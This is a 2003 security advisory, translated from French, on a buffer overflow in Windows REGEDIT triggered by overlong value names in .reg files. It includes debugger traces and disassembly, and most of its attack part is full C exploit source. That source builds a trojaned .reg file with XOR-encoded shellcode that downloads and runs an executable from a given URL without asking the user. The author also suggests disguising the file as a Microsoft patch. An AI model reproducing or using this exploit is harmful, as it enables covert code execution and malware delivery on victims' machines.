Mars, the 31th 2003 - Traducted in Eng April the 7Th 2003 Win32 security Advisory about ********************************************************************************************** ================================ REGEDIT BUFFER OVERFLOW ===================================== ********************************************************************************************** Explanantion, Use and Prevent. ********************************************************************************************** ============================================================================================== ********************************************************************************************** By ThreaT. INTRODUCTION ____________ Mars, the 29th 2003, in a lost country near Lyon (France), a vuln of overflow, commonly called 'Buffer Overflow' has been found in a standard tool in a well-known OS called Windows -> REGEDIT. Even thought this vuln has been _only_ tested on Win200 (pro & server) Service Pack 0,1,2 and 3, this vuln might be presents on the other Microsoft systems using technology NT, it is for what I say to you to have the greatest attention about this advisory of safety. EXPLANATION ___________ REGEDIT.EXE imports informations in the register using propriatery scripts with the extension .REG If this file had a +260 char valorname, REGEDIT will do an 'exception error' caused by the function RegSetValueExw, that calls itself the NTDLL.DLL Here the problem : ----------------------------------------------------------------------------------------------- Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Vuln] "AAAAAAAAAAAAAAAAAAAAA x 270" = "Vulnerable string" ----------------------------------------------------------------------------------------------- If you try to import this file, you will have this message : ----------------------------------------------------------------------------------------------- Module Load: C:\WINNT\regedit.exe (symbol loading deferred) Thread Create: Process=0, Thread=0 Thread Create: Process=0, Thread=1 Second chance exception c0000005 (Access Violation) occurred Thread stopped. > rt EAX=00000006 EBX=00000002 ECX=0006ffe0 EDX=00000000 ESI=77da7d4d EDI=00000000 EIP=00410041 ESP=0006fb24 EBP=00410041 EFL=00000206 CS=001b DS=0023 ES=0023 SS=0023 FS=003b GS=0000 Dr0=e140f91c Dr1=027da8c0 Dr2=8110ac88 Dr3=f4eeaac4 Dr6=80447434 Dr7=80469560 > dd esp 0x0006FB24 00410041 00410041 00410041 00000000 A.A.A.A.A.A..... ----------------------------------------------------------------------------------------------- As we can see, the stack is totally erased by our chainchar function, formated in WideChar, and, of course, we are going to see why and what call this error... Let's have a look at REGEDIT when it tries to analyse his file: trace in the 'ReadFile' call. Some help about this API : BOOL ReadFile( HANDLE hFile, // handle of file to read LPVOID lpBuffer, // address of buffer that receives data DWORD nNumberOfBytesToRead, // number of bytes to read LPDWORD lpNumberOfBytesRead, // address of number of bytes read LPOVERLAPPED lpOverlapped // address of structure for data ); oK, let's go. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Disassembly of File: regedit.exe Code Offset = 00000600, Code Size = 0000AE00 Data Offset = 0000B400, Data Size = 00000200 * Reference To: KERNEL32.ReadFile, Ord:023Dh :0100820D FF151C110001 Call dword ptr [0100111C] // look where are the * Reference To: KERNEL32.ReadFile, Ord:023Dh :01008C27 FF151C110001 Call dword ptr [0100111C] // differents call to the * Reference To: KERNEL32.ReadFile, Ord:023Dh :01008C4D FF151C110001 Call dword ptr [0100111C] // function ReadFile (in Regedit) +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Module Load: C:\WINNT\regedit.exe (symbol loading deferred) // we attach the debugger Thread Create: Process=0, Thread=0 Process attached is stopped .attach 0x4c4> > bp 0x100820D // applying the breakpoint > bp 0x1008C27 > bp 0x1008C4D Hard coded breakpoint hit // let's go :) - 01008C17 6800000100 push 10000h // number of bytes to read 01008C1C 68C0C30201 push 102C3C0h // address of buffer that receives data 01008C21 FF35C0C30401 push dword ptr ds:[104C3C0h] // handle of file to read 01008C27 FF151C110001 call dword ptr ds:[100111Ch] // CALL ReadFile - > dd 102C3C0 0x0102C3C0 00690057 0064006e 0077006f 00200073 W.i.n.d.o.w.s. . 0x0102C3D0 00650052 00690067 00740073 00790072 R.e.g.i.s.t.r.y. 0x0102C3E0 00450020 00690064 006f0074 00200072 .E.d.i.t.o.r. . 0x0102C3F0 00650056 00730072 006f0069 0020006e V.e.r.s.i.o.n. . 0x0102C400 002e0035 00300030 000a000d 000a000d 5...0.0......... 0x0102C410 0048005b 0045004b 005f0059 004f004c [.H.K.E.Y._.L.O. 0x0102C420 00410043 005f004c 0041004d 00480043 C.A.L._.M.A.C.H. 0x0102C430 004e0049 005c0045 004f0053 00540046 I.N.E.\.S.O.F.T. > d 0x0102C440 00410057 00450052 0056005c 006c0075 W.A.R.E.\.V.u.l. 0x0102C450 005d006e 000a000d 00410022 00410041 n.].....".A.A.A. 0x0102C460 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A. 0x0102C470 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A. 0x0102C480 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A. 0x0102C490 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A. 0x0102C4A0 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A. 0x0102C4B0 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A. > atm, no probs. so, on the road again... =boom= 01008956 Adress do a crash ! ------------------------------------------------------------------------- 01008948 FF75F8 push dword ptr [ebp-8] 0100894B 56 push esi 0100894C FF75FC push dword ptr [ebp-4] 0100894F 53 push ebx 01008950 FF750C push dword ptr [ebp+0Ch] 01008953 FF7508 push dword ptr [ebp+8] 01008956 FF1510100001 call dword ptr ds:[1001010h] // wtf is this call ? > dd ds:1001010 // we can ask to our girlfriend the stack :) 0x01001010 77da9348 77da90b0 77dadcc7 77dad782 H..w...w...w...w > dd 77da9348 // ok, but... Module Load: C:\WINNT\SYSTEM32\advapi32.dll (could not open symbol file) <- hum, an 'advapi32.dll' function :))) Addr:77DA9348 Ord: 436 (01B4h) Name: RegSetValueExW // ok :) Ok, more explanation will be better.. LONG RegSetValueEx( HKEY hKey, // handle of key to set value for LPCTSTR lpValueName, // address of value to set DWORD Reserved, // reserved DWORD dwType, // flag for value type CONST BYTE * lpData, // address of value data DWORD cbData // size of value data ); We are continuing... 77DA93E1 FF750C push dword ptr [ebp+0Ch] 77DA93E4 8D45D4 lea eax,[ebp-2Ch] 77DA93E7 50 push eax 77DA93E8 FF150C13DA77 call dword ptr ds:[77DA130Ch] // ntdll!RtlInitUnicodeString -> inside 77F87124 57 push edi 77F87125 8B7C240C mov edi,dword ptr [esp+0Ch] 77F87129 8B542408 mov edx,dword ptr [esp+8] 77F8712D C70200000000 mov dword ptr [edx],0 77F87133 897A04 mov dword ptr [edx+4],edi 77F87136 0BFF or edi,edi 77F87138 7415 je 77F8714F 77F8713A 83C9FF or ecx,0FFFFFFFFh // ecx = 0xFFFFFFFF ! no check ! 77F8713D 33C0 xor eax,eax 77F8713F F266AF repne scas word ptr [edi] // SO! OVERWRITE OF THE DEATH 77F87142 F7D1 not ecx the vuln is located in RegSetValueExW, what call the vulnerable 'ntdll!RtlInitUnicodeString' function. As you can see, this function use a poor strcpy, and it overwrite all the data. And.. i don't know if the function is not the most famous vuln in NTDLL ! So.. and if we can call this exploit like 'NTDLL through REGEDIT' :) USE ___ Now, stop laughing, and going to look if there's a solution to use this bad-bug, hrhr. As we can see in the explanation, REGEDIT works with string char, WideChar formated, wich constitutes a problem in the hijack of the execution after the crash of EIP . but, after a good look, we can easily found a soluce in this minor problem. --------------------------- HEXEDIT ----------------------------- 00000000 FFFE 5700 6900 6E00 6400 6F00 7700 7300 ..W.i.n.d.o.w.s. 00000016 2000 5200 6500 6700 6900 7300 7400 7200 .R.e.g.i.s.t.r. 00000032 7900 2000 4500 6400 6900 7400 6F00 7200 y. .E.d.i.t.o.r. 00000048 2000 5600 6500 7200 7300 6900 6F00 6E00 .V.e.r.s.i.o.n. 00000064 2000 3500 2E00 3000 3000 0D00 0A00 0D00 .5...0.0....... 00000080 0A00 5B00 4800 4B00 4500 5900 5F00 4C00 ..[.H.K.E.Y._.L. 00000096 4F00 4300 4100 4C00 5F00 4D00 4100 4300 O.C.A.L._.M.A.C. 00000112 4800 4900 4E00 4500 5C00 5300 4F00 4600 H.I.N.E.\.S.O.F. 00000128 5400 5700 4100 5200 4500 5C00 5600 7500 T.W.A.R.E.\.V.u. 00000144 6C00 6E00 5D00 0D00 0A00 2200 4100 4100 l.n.].....".A.A. 00000160 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000176 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000192 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000208 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000224 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000240 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000256 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000272 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000288 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000304 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000320 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000336 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000352 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000368 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000384 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000400 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000416 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000432 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000448 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000464 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000480 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000496 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000512 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000528 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000544 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000560 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000576 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000592 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000608 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000624 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000640 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000656 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A. 00000672 4100 4100 4242 4242 2B2B 2B2B 2B2B 2B2B A.A.BBBB++++++++ // BBBB = Overwrite of EIP 00000688 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000704 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ // ++++ = probably shellcode 00000720 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000736 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000752 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000768 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000784 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000800 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000816 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000832 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000848 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000864 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000880 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000896 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000912 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000928 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000944 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++ 00000960 2B2B 2B2B 2B2B 2B2B 2200 3D00 2200 5600 ++++++++".=.".V. 00000976 7500 6C00 6E00 6500 7200 6100 6200 6C00 u.l.n.e.r.a.b.l. 00000992 6500 2000 7300 7400 7200 6900 6E00 6700 e. .s.t.r.i.n.g. 00001008 2200 0D00 0A00 0D00 0A00 "......... ----------------------------------------------------------------- So, if I export this config, it gives : -- Thread Create: Process=0, Thread=1 Second chance exception c0000005 (Access Violation) occurred Thread stopped. > rt EAX=00000006 EBX=00000002 ECX=0006ffe0 EDX=00000000 ESI=77da7d4d EDI=00000000 EIP=42424242 ESP=0006fb24 EBP=00410041 EFL=00000206 CS=001b DS=0023 ES=0023 SS=0023 FS=003b GS=0000 Dr0=00000000 Dr1=ffb6ce48 Dr2=e1378c38 Dr3=f53d3a01 Dr6=00000000 Dr7=e13b9848 > -- EIP = 42424242 :))) It's a classical BoF (Buffer OverFlow), and for the Tradition, the stack kept a part of our buffer overflow, when the crash appears. > dd esp 0x0006FB24 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ 0x0006FB34 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ 0x0006FB44 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ 0x0006FB54 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ 0x0006FB64 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ 0x0006FB74 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ 0x0006FB84 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ 0x0006FB94 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ > the problem is in returned address. They are returned by the stack and are set with a NULL bytes, what take us some liberty of action. But, we haven't finished with the ReadFile() function : where the hell did it push they data ? :) > dd 102C3C0 0x0102C3C0 00690057 0064006e 0077006f 00200073 W.i.n.d.o.w.s. . 0x0102C3D0 00650052 00690067 00740073 00790072 R.e.g.i.s.t.r.y. 0x0102C3E0 00450020 00690064 006f0074 00200072 .E.d.i.t.o.r. . 0x0102C3F0 00650056 00730072 006f0069 0020006e V.e.r.s.i.o.n. . 0x0102C400 002e0035 00300030 000a000d 000a000d 5...0.0......... 0x0102C410 0048005b 0045004b 005f0059 004f004c [.H.K.E.Y._.L.O. 0x0102C420 00410043 005f004c 0041004d 00480043 C.A.L._.M.A.C.H. 0x0102C430 004e0049 005c0045 004f0053 00540046 I.N.E.\.S.O.F.T. > dd 102C670 0x0102C670 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ 0x0102C680 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ 0x0102C690 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ 0x0102C6A0 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ 0x0102C6B0 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ 0x0102C6C0 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ 0x0102C6D0 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ 0x0102C6E0 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++ > Enjoy! the 102C760 address shows directly our shellcode, and now ReadFile() works now with a new param 'nNumberOfBytesToRead' set to 10000h, so.. we have 65536 bytes free :) THE EXPLOIT ___________ Now, we have all the info about this vuln, it's to do and exploit (the real exploit...) Let's have a trivial tiny soft who can easyly build trojaned .reg files, ------------------------------------------ REGEXPLOIT.C --------------------------------------------- /*************************************** *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@* *@ REGEDIT Buffer Overflow Exploit ! @* *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@* * * * Discovered & coded By ThreaT. * * * *#####################################* *# -> ThreaT@Ifrance.com #* *# -> http://www.chez.com/mvm #* *# -> http://s0h.cc/~threat #* *#####################################* * Date : 31/03/2003 * *************************************** */ /* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * This exploit create a malicious .reg file * * that when it try to write data into the * * registery, overwrite the ret addr, because * * a RegSetValueExW() function work with an * * unchecked buffer, and execute our abitrary * * code who download a trojan for local * * execution without user ask ! * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -> compile : cl regexploit.c usage : regexploit.exe is a full link to an executable file, it can be like http://www.host.com/trojan.exe or file://c:/path/executable.exe */ // Tested on Win2k pro & server (fr) SP0 SP1 SP2 & SP3 #include HANDLE RegFile; char *ToWideChar(const char *cszANSIstring) { int nBufSize; WCHAR *wideString; if(cszANSIstring == NULL) return NULL; nBufSize = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, NULL, 0 ); wideString = (WCHAR *)malloc(nBufSize +1); MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, wideString, nBufSize); return (char*)(wideString); } void Write (const char *str, int number) { DWORD lpNumberOfBytesWritten; WriteFile (RegFile,str,number,&lpNumberOfBytesWritten,NULL); } void main (int argc, char *argv[]) { int i; char entete[] = "Windows Registry Editor Version 5.00\r\n\r\n" "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Discovered\\and\\coded\\by\\ThreaT]\r\n", *MastaBuff, *myurl, RealGenericShellcode[] = "\xA0\xC6\x02\x01" // Adresse de retour // nop "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // decrypteur de shellcode "\x68\x5E\x56\xC3\x90\x8B\xCC\xFF\xD1\x83\xC6\x0E\x90\x8B\xFE\xAC" "\x34\x99\xAA\x84\xC0\x75\xF8" // shellcode xorised avec 0x99 "\x72\xeb\xf3\xa9\xc2\xfd\x12\x9a\x12\xd9\x95\x12\xd1\x95\x12\x58\x12\xc5\xbd\x91" "\x12\xe9\xa9\x9a\xed\xbd\x9d\xa1\x87\xec\xd5\x12\xd9\x81\x12\xc1\xa5\x9a\x41\x12" "\xc2\xe1\x9a\x41\x12\xea\x85\x9a\x69\xcf\x12\xea\xbd\x9a\x69\xcf\x12\xca\xb9\x9a" "\x49\x12\xc2\x81\xd2\x12\xad\x03\x9a\x69\x9a\xed\xbd\x8d\x12\xaf\xa2\xed\xbd\x81" "\xed\x93\xd2\xba\x42\xec\x73\xc1\xc1\xaa\x59\x5a\xc6\xaa\x50\xff\x12\x95\xc6\xc6" "\x12\xa5\x16\x14\x9d\x9e\x5a\x12\x81\x12\x5a\xa2\x58\xec\x04\x5a\x72\xe5\xaa\x42" "\xf1\xe0\xdc\xe1\xd8\xf3\x93\xf3\xd2\xca\x71\xe2\x66\x66\x66\xaa\x50\xc8\xf1\xec" "\xeb\xf5\xf4\xff\x5e\xdd\xbd\x9d\xf6\xf7\x12\x75\xc8\xc8\xcc\x66\x49\xf1\xf0\xf5" "\xfc\xd8\xf3\x97\xf3\xeb\xf3\x9b\x71\xcc\x66\x66\x66\xaa\x42\xca\xf1\xf8\xb7\xfc" "\xe1\x5f\xdd\xbd\x9d\xfc\x12\x55\xca\xca\xc8\x66\xec\x81\xca\x66\x49\xaa\x42\xf1" "\xf0\xf7\xdc\xe1\xf3\x98\xf3\xd2\xca\x71\xb5\x66\x66\x66\x14\xd5\xbd\x89\xf3\x98" "\xc8\x66\x49\xaa\x42\xf1\xe1\xf0\xed\xc9\xf3\x98\xf3\xd2\xca\x71\x8b\x66\x66\x66" "\x66\x49\x71\xe6\x66\x66\x66"; printf ("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n" "Regedit.exe Buffer Overflow Exploit\n" "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n" "Discovered & Coded By ThreaT.\n\n" "contact : ThreaT@Ifrance.com\n" "URL : http://www.chez.com/mvm\n\n"); if (!argv[1]) { printf ("_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\n" "Usage : regexploit.exe \n" "Exemple : regexploit.exe file://c:/winnt/system32/cmd.exe\n" "_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\n"); ExitProcess (0); } /* Creation du fichier Reg malicieux */ RegFile = CreateFile ("VulnFile.reg",GENERIC_WRITE,FILE_SHARE_WRITE, NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL); if (RegFile == INVALID_HANDLE_VALUE) { printf ("Cannot create a vuln regfile !\n"); ExitProcess (0); } Write ("\xFF\xFE",2); // header .reg script Write (ToWideChar (entete),strlen (entete)*2); // head of regedit MastaBuff = (char *) LocalAlloc (LPTR,270); // fill the 1st part MastaBuff[0] = '"'; memset (&MastaBuff[1],'0',260); // with zeros Write (ToWideChar (MastaBuff),strlen (MastaBuff)*2); // Wrote in the file the 1st part of vuln str myurl = (char *) LocalAlloc (LPTR, strlen (argv[1])+10); lstrcpy (myurl,argv[1]); for (i=0; i < strlen (argv[1]); argv[1][i++]^=0x99); // encrypt the URL lstrcat (RealGenericShellcode,argv[1]); // final shellcode creation lstrcat (RealGenericShellcode,"\x99"); // end char Write (RealGenericShellcode,strlen (RealGenericShellcode)); // add shellcode to the file CloseHandle (RegFile); printf ("un fichier .reg vulnerable appele VulnFile.reg viens d'etre cree\n" "pour downloader et executer '%s'\n",myurl); } ----------------------------------------------------------------------------------------------------- D:\code\exploits\regedit>regexploit file://c:/winnt/system32/cmd.exe @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Regedit.exe Buffer Overflow Exploit @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Discovered & Coded By ThreaT. contact : ThreaT@Ifrance.com URL : http://www.chez.com/mvm un fichier .reg vulnerable appele VulnFile.reg viens d'etre cree pour downloader et executer 'file://c:/winnt/system32/cmd.exe' D:\code\exploits\regedit> - This exploit creates a file called VulnFile.reg, for prevent bad admin and unsafe execution and reading. ----------------------------------------------------------------------------------------------------- Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Discovered\and\coded\by\ThreaT] "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000?A??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ------------------------------------------------------------------------------------------------------- It can be very easy with a 'hacker' to make pass this file for an unspecified patch recommended by Microsoft. Knowing how the file can have a size going up to 65535 bytes, and that our chains is formatted in WideChar, the shellcode can then contain of the 00 and executer practically any spot on the targeted system, which constitutes a vector of diffusion within the framework of a possible attack viral, or in all other advanced attacks! In the case so above, the vulnerable file was designed for execution ofa cmd.exe at the time of an attempt at importation in the Register. This one goes very well: if you load the reg and that you answer 'yes' the confirmation of writing in the Register, it crashes on an address memory 0x00000000 at the time of the direct importation from regedit. This does not call into question the vulnerability, because the problem come from my shellcode who does not manage to charge urlmon.dll in this specific case :p (/me is a poor lamer) It's time for you to create a shellcode, with your need. PREVENT _______ For stage with the problem, I tried to apply the patch diffused to anything counter ' NTDLL through Webdav ', but ... either the patch this glad to correct the fault in IIS, or have patched an other default. I will be satisfied to point out the rules of safety, namely to pay attention to the reg files in the future, and to configure your filter of malicious extention with this new information. Microsoft was not prevented yet on this vulnerability, hope they have people charged to look on French advisories :)) CONTACT _______ Email : ThreaT@Ifrance.com URL : http://www.chez.com/mvm Traduction : GuY - yvan.colona@wanadoo.fr